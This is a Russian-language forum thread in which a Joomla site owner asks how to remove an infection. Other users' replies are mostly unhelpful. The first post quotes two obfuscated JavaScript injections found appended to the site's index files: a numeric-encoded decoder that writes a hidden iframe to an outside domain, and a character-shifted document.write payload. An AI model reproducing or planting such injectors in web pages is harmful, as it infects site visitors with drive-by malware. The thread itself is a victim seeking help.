Атака на joomla

Добрый день! Нуждаюсь в совете специалиста. Есть сайт www.vsemnado.com, когда-то заинтересовался joomla, и повесил его для экспериментов.
Веб мастер и программист я-асс! Вернее не асс, а АВС! (это, чтоб понятен был мой уровень) Месяц я на него не заходил, а тут решил его обновить и запустить в дело…
Захожу а кашперовский визжит – на сайте вирус: троянская программа Trojan-Downloader.JS.Agent.bbi !! Хостеры ни чем? говорят помочь не можем.
Слил начал разбираться он дописывает ко всем файлам с именем “index” вот такое:
language='JavaScript'>
<!--
function decode() {
var t,o,l,i,j;
var s='';
s=s+'060047116101120116097116101097062060047116101120116097114101097062';
s=s+'060105102114097109101032115114099061034104116116112058047047115112108046118105112045100100111115046';
s=s+'111114103047105110100101120046112104112034032119105100116104061049032104101105103104116061049032115';
s=s+'116121108101061034118105115105098105108105116121058032104105100100101110034062060047105102114097109';
s=s+'101062';
t=''; l=s.length; i=0;
while(i < (l-1)) {
for(j=0;j<3;j++)
{
t=t+s.charAt(i);
i++;
}
document.write(String.fromCharCode(t));
t='';
}
}

decode();
//-->
В последней строке </script> удалил чтобы не подарить вирус, и в начале <script –убрал, думаю уже так вирус не работает…
Удалил старую , залил новую joomlu.
Вроде должно, было бы все нормально, так нет… Заметил, что начали тормозить переключения в админке. Понаблюдал – обращается на сайт kizadarai.info.
Так же в файлах index обнаружен код в конце:

</ скрипт ><скрипт>var source ="=tdsjqu?epdvnfou/xsjuf)voftdbqf)(&4d&84&74&83&7:&81&85&4f&75&7g&74&86&7e&7
6&7f&85&3f&88&83&7:&85&76&39&64&85&83&7:&7f&78&3f&77&83&7g&7e&54&79
&72&83&54&7g&75&76&39&47&41&3d&42&42&46&3d&4:&4:&3d&42&42&45&3d&42
&41&46&3d&42&42&43&3d&42&42&47&3d&47&43&3d&44&43&3d&42&42&49&3d&4:
&48&3d&42&42&45&3d&44&43&3d&49&44&3d&42&42&47&3d&42&42&45&3d&47&4
2&3d&44&45&3d&42&41&41&3d&42&42&47&3d&42&41&45&3d&47&42&3d&45&4:&3
d&44&43&3d&42&41&45&3d&42&41&42&3d&42&41&46&3d&42&41&44&3d&42&41&
45&3d&42&42&47&3d&47&42&3d&45&4:&3d&44&43&3d&42&42&46&3d&42&42&47&
3d&42&43&42&3d&42&41&49&3d&42&41&42&3d&47&42&3d&44&4:&3d&42&42&49&
3d&42&41&46&3d&42&42&46&3d&42&41&46&3d&4:&49&3d&42&41&46&3d&42&41&
49&3d&42&41&46&3d&42&42&47&3d&42&43&42&3d&46&49&3d&44&43&3d&42&41&
45&3d&42&41&46&3d&42&41&41&3d&42&41&41&3d&42&41&42&3d&42&42&41&3d&
44&4:&3d&47&43&3d&47&41&3d&45&48&3d&42&41&46&3d&42&41&43&3d&42&42&
45&3d&4:&48&3d&42&41&4:&3d&42&41&42&3d&47&43&3d&44&43&3d&47&41&3d&
42&41&46&3d&42&41&43&3d&42&42&45&3d&4:&48&3d&42&41&4:&3d&42&41&42&
3d&44&43&3d&42&42&46&3d&42&42&45&3d&4:&4:&3d&47&42&3d&44&4:&3d&42&
41&45&3d&42&42&47&3d&42&42&47&3d&42&42&43&3d&46&49&3d&45&48&3d&45&
48&3d&42&41&48&3d&42&41&46&3d&42&43&43&3d&4:&48&3d&42&41&41&3d&4:&4
8&3d&42&42&45&3d&4:&48&3d&42&41&46&3d&45&47&3d&42&41&46&3d&42&42&41
&3d&42&41&43&3d&42&42&42&3d&45&48&3d&42&42&48&3d&42&42&43&3d&42&41&
41&3d&45&48&3d&42&41&46&3d&42&42&41&3d&42&41&41&3d&42&41&42&3d&42&4
3&41&3d&45&47&3d&42&42&43&3d&42&41&45&3d&42&42&43&3d&44&4:&3d&44&43&
3d&42&42&4:&3d&42&41&46&3d&44&45&3d&42&44&3d&42&41&3d&42&41&41&3d&42
&42&42&3d&4:&4:&3d&42&42&48&3d&42&41&4:&3d&42&41&42&3d&42&42&41&3d&4
2&42&47&3d&45&47&3d&42&42&4:&3d&42&42&45&3d&42&41&46&3d&42&42&47&3d&
42&41&42&3d&45&41&3d&49&44&3d&42&42&47&3d&42&42&45&3d&45&47&3d&42&42
&46&3d&42&42&48&3d&4:&49&3d&42&42&46&3d&42&42&47&3d&42&42&45&3d&42&41
&46&3d&42&42&41&3d&42&41&44&3d&45&41&3d&46&44&3d&46&41&3d&45&45&3d&45
&4:&3d&45&49&3d&46&44&3d&45&42&3d&45&45&3d&49&44&3d&42&42&47&3d&42&42
&45&3d&45&47&3d&42&42&46&3d&42&42&48&3d&4:&49&3d&42&42&46&3d&42&42&47&
3d&42&42&45&3d&42&41&46&3d&42&42&41&3d&42&41&44&3d&45&41&3d&45&49&3d&4
5&45&3d&46&44&3d&46&41&3d&45&42&3d&45&42&3d&44&43&3d&47&41&3d&45&48&3d
&42&42&46&3d&4:&4:&3d&42&42&45&3d&42&41&46&3d&42&42&43&3d&42&42&47&3d&47&43&3:
&3:&4c&4d&3g&84&74&83&7:&81&85&4f(**=0tdsjqu?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result); </ скрипт >
Правда кашперовский как вирус не определяет, другими не пробовал...
Почистил, снова появляется и что самое интересное дописывает себя, и файлы становятся больше и больше…
Пробовал пробить ай пи не получается, защищен. Не знаю чем защитить сайт.
Помочь можете?

 

Сносить нахрен Джумлу.

 

Топай к ним на форум.. и скажи что они редиски


Проблема в том, что форума у них нет... ничего нет... населена роботами... даже ай пи
Нашел ихнего регистратора privacyprotect.org накатал им жалобу, но пока не знаю... я не знал, что ай пи можно защищать... а как себя защитить? Я понимаю, что полностью это не возможно... это как налоговая, защищает наше государство от тех, кто пытается его надуть... от нас же...

 

Klaus Doring Сносить нахрен Джумлу.


Я б снес... но другие то мои сайты работают. Мне б по существеннее - совет что делать

 

а что ты от них хочешь? чтобы они извенились?

 

Нет я не ArtDjan. Я понял, что у них было что то похожее, но у меня это было не только на главной но и в админке. 335 файлов index

 

Смешно... , но от них я ничего не хочу, может только, если чем другим займутся... Просто может кто знает, как с этим бороться?